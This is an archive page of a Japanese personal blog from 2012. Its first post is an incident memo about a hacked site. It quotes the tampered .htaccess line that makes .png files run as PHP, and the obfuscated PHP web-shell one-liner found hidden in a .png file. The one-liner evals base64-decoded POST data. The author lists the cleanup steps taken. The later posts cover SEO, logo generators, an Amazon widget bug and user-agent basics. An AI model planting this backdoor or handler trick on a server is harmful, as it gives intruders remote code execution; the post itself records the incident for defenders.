【メモ】.htaccess改ざん事例(.htaccess/png/eval)※追記あり

5月 16th, 2012

正直解決策になっているのかどうかよくわからないのですが日本語のページがほとんどなかったのでメモ。

 

現象

あるサイトの.htaccessが改ざんされていました。

【元】
AddHandler application/x-httpd-php .html

【改ざん】
AddHandler application/x-httpd-php .png

→「pngファイルをphpととして読み込む」的なもの?

 

そして.htaccessと同じ階層に、「.****.png」という不可解なファイル。
それをファイルとして開いてみると

<?php ($_=$_POST).($_1=’_').($_4=$$_1).($_4=$_4[$_1]).($_4($$_1)).eval(base64_decode($_4($$_1)));?>

というコードが記載。なにこれこわい。

※あとファイル更新時間でソートをかけたらindex.bak.phpみたいなファイルがありました(消してしまったのでうろ覚え)。

 

応急処置

色々と情報を集めてみたのですが、POSTデータを実行している云々で実際の挙動に何が起こっているのか正直よくわかりませんでした。
ひとまずの応急処置として

1..****.pngのデータを削除
2.パスワード関連全変更
3..htaccessの修正。
 AddHandler application/x-httpd-php .png
 →pngをhtmlに修正
4.index.bak.phpの削除

といった対処をしています。
もしなにか分かる情報(「こうした方がいいよ!」とか)があれば教えていただけるとありがたいです!

 

※追記(2012.5.18 8:44a.m.)
ロリポップのサーバーで起こった事例、という情報をいただいています(2件)。

Categories PHPやろう, WordPress, パソコン・インターネット, 知らなかったシリーズ | Comment (0)

海外からの自然リンク~画像は言語を超える

3月 15th, 2012

以前「【バカ毛・世界に進出】言語が異なる海外の方にサイトを紹介された事例」という更新で、海外のSNSで当サイトが取り上げられた例を記載したのですが今度は海外のブログに紹介されましたw

Anyways, the method was simply to count the ‘circles’ in the numbers. like ’6′ has one circle in it so its value is 1. 6666 is therefore has the value of 4. numbers like ’8′ has two circles so its value is 2. the illustration below from baka-baka should be helpful.
Through My Eyes: Answer for the 2581=?? riddle

(意訳)この問題は単純に円の数を数えます。例えば・・・(略)・・・「バカ-バカ」に置いてあったこの画像が分かりやすいです。

 

 

自然リンクのチャンスになるのは画像とか、動画とか、言語を超えたものにもあるのかもしれません。

 

 

 

てか、「バカバカ」て。

Categories SEO, パソコン・インターネット | Comment (0)

ロゴデザインジェネレーターで遊んでたら土曜日が終わった【追加作成あり】

2月 5th, 2012

誰でも手軽にロゴが作れるというサイトを見つけたのでいろんなものを作ってみました。
最初のものは見たまんまですがAKB48風バカに毛が生えたロゴ。

完全に自己満足です。本当にありがとうございました。

 

各種作ってみたロゴ

twitter風

ラブプラス風

らき☆すた風

けいおん!風

とある魔術の禁書目録風

まどか☆マギカ風。ちょっとデザイン崩しちゃいました。

その他にもGoogle風ロゴ、amazon風ロゴなど様々なロゴが作れます。
参照:ロゴジェネレーター

デザインが出来て、それを誰でもできるような仕組みにするっていいですね。

 

※2012.2.5 20:33追記

@kim_identityさんの「とある魔術の禁書目録」風ロゴをヘッダーに入れてみた | 大阪のWEBマーケティング雑記を見て、そうだよね、禁書目録とか超電磁砲とか考えると四文字の漢字にしなくちゃダメだよね、と思って修正。

うん、強引すぎるなw

あと、はがないジェネレーターというのも見つけたので作成。

ただの自虐じゃないのかというね・・・

Categories パソコン・インターネット, 知らなかったシリーズ | Comment (0)

【メモ】Amazonアフィリエイトの画像リンクが「欲しいものがきっと見つかります」となってしまうエラー【追記あり】

1月 14th, 2012

Amazonのアフィリエイトを貼っていたりするのですが、画像リンクにエラーが。

本来、各々の書籍の画像が表示されるべき所が共通の画像になっています。

 

問題点

・画像が共通のものになっている

・飛び先がAmazonTOPになっている
(※ただ、アフィリエイトのコードは付いているようなのでそこから購入されればお金はh(ry)

 

他の事例

最近の事例ではないのですが、過去にもこんな事例があったみたいです。

ジューセーで行こう 「欲しいものがきっと見つかります」

記事は2008年のもの&後日直っていた、とのことなのでとりあえず放っておけば直るということですかね。

 

※2012.1.20 22:38追記
Amazonアソシエイトにメッセージが出てました。修復したようです。

【復旧のお知らせ】1月11日より発生していたアソシエイトセントラルで提供中の一部ウィジェットの不具合(指定した商品が正しく表示されない、自動的にバナーに差し替わってしまうなど)ですが、1月16日18:00に復旧いたしました。みなさまにはご迷惑をおかけして大変申し訳ございませんでした。

Categories パソコン・インターネット | Comment (0)

ユーザーエージェント(UserAgent)とは何か?を分かりやすく書いてみた

1月 8th, 2012

昨年GoogleウェブマスターブログでiPhone向けのロボットが発表されました。
参照:Google ウェブマスター向け公式ブログ: スマートフォン版 Googlebot-Mobile の導入について

この発表の際に聞かれたのが「ユーザーエージェントってなんですか?」。

調べても分からなかったとのことで「ユーザーエージェントとは」の上位サイトを確認してみたところ・・・

1位

ユーザーエージェント (User agent、略称UA(ユー エー))とは、利用者があるプロトコルに基づいてデータを利用する際に用いるソフトウェアまたはハードウェアを指す。「利用者エージェント」とも言う。
HTTPを用いてWorld Wide Webにアクセスするための「ウェブブラウザ」が代表的なユーザーエージェントの1つであるが、「ユーザーエージェンt(ry
Wikipedia「ユーザーエージェント」

2位

ユーザーエージェントとは、Webサイトへのアクセスの際に使用されるプログラムのことである。

HTMLを解釈して画像化し、Webサイトとしてディスプレイに映し出すためのレンダリングを行い、ディスプレイに画像・文字などを表示するためのWebブラウザや、検索用データベーs(ry
ユーザーエージェントとは – IT用語辞典 Weblio辞書

うん、激しくわかりにくい。
というわけで、若干大まかな説明なのですが簡単にまとめてみました。

 

日常生活に例えてみる

まずユーザーエージェントのことを一旦頭から外しましょう。
普段、みなさんが家を訪問する際にいきなり家のドアを開けることはないと思います。
まず最初に自分の名前を名乗りますよね。


※クリックすると拡大します。

玄関で「山田です」など名乗っています。
で、家の主人が「あら、山田さん。お待ちしていました。正は2階にいるので上がってくださいな」とか言って、招き入れてくれるわけですね。

 

webも同じような仕組み

ブラウザを何となく開いて、何となくサイトを見ることが多いかと思うのであまり意識はしないのですが、実はアクセスする際もこの「名乗り」があります。


※クリックすると拡大します。

 

各々のユーザーが「InternetExplorerです」など名乗っています。
その「名乗り」がユーザーエージェントです。

 

ちなみに簡易的に表現しましたが実際のユーザーエージェントはこんな感じ。

「GooglebotのiPhone版ロボットです」
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)

「docomoのSH901iCです」
DoCoMo/2.0 SH901iC(c100;TB;W24H12)

 

何が出来るの?

ウェブサイト側で「このユーザーエージェントはこっちのページを見せる」などを設定できます。
例えば

・PCサイト/モバイルサイト/スマートフォンサイトの振り分け
・flashサイト/flash非対応サイトの振り分け

など。

こんな感じです。
ユーザーの名乗りを聞いてから適切なところに誘導ができます。

 

応用編(ユーザーエージェントの偽装)

firefoxのアドオンなどでユーザーエージェントの偽装をすることも可能。

参照:User Agent Switcher :: Add-ons for Firefox

これを使用することで、firefoxのブラウザで「SH901iCです」などと名乗りを偽ることができます。
そうすると、モバイルサイトの閲覧がPCでできることがあります。

※完全に「閲覧ができる」と書いていないのはユーザーエージェント以外にも制限の方法があり、別の設定で制限をかけられていると閲覧することができないためです。
※ちなみにGoogleなどの検索クローラーもUserAgentの偽装を使っています。なのでGooglebotのiPhone版が出たからといって、実際にiPhoneからアクセスしているわけではありません。 

 

以上、簡単ではありますが、もしかしたら需要があるかもと思いまとめてみました。
ご意見・ご指摘等あればよろしくお願いいたします!

 

※おまけ
UserAgent調べる君(今現在のUserAgentをチェックできます。いろんな端末でアクセスしてみると面白いです)
http://www.baka-ke.com/lab/useragent.php

Categories Google, SEO, パソコン・インターネット, モバイル, モバイルSEO | Comment (0)